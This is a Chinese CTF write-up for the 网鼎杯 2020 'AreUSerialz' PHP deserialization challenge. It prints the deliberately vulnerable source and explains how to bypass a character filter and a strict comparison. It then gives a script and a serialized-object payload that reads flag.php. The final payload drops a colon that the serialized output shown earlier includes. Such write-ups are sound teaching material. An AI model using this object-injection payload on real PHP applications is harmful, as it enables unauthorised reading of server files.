[网鼎杯 2020 青龙组]AreUSerialz

代码审计

首先打开题目看到的是一串代码
那就对代码进行代码审计

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

经过审计可得,这个题目是需要传入一个序列化之后的类对象,而且要绕过两层防护

两层防护

is_valid()

首先我们传入的参数经过了一个函数的处理

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

这个函数的作用就是筛选出特殊字符,因为在源码中的FileHandler对象中的属性值是protected的,也就是受保护的属性,这类的属性值在序列化的过程中会出现不可见字符\00*\00及将属性保护起来,但是这会使函数返回false,所以我们要绕过protected

绕过方法:在php7.1以上的版本对属性类型不敏感,所以可以将属性改为public,public属性序列化没有不可见字符

__destruct()

在类对象中的__destruct()函数中,op === "2"这是一个强比较

function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

然后在process()函数中,op=="2"是弱比较

public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

这里需要绕过__destruct()函数中的强比较

绕过方法:可以使传入op为数字的2,从而使__destruct()函数中强比较返回false,而使process()函数的弱比较返回true.

本地进行序列化操作

<?php

class FileHandler
{
    public $op = 2;
    public $filename = "flag.php";
    public $content = "1";
}

$a = new FileHandler();
$b = serialize($a);
echo $b;
?>

上面的content其实可以传任意的一个值,因为在__destruct()函数中会将content转换成空值,对结果不造成影响

序列化之后的结果:

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:1:"1";}

payload:

?str=O:11:"FileHandler":3{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:1:"1";}

最后的结果在网页源代码中

image-20220224174451138

posted @ 2022-02-24 17:46  Townmacro  阅读(41)  评论(0编辑  收藏  举报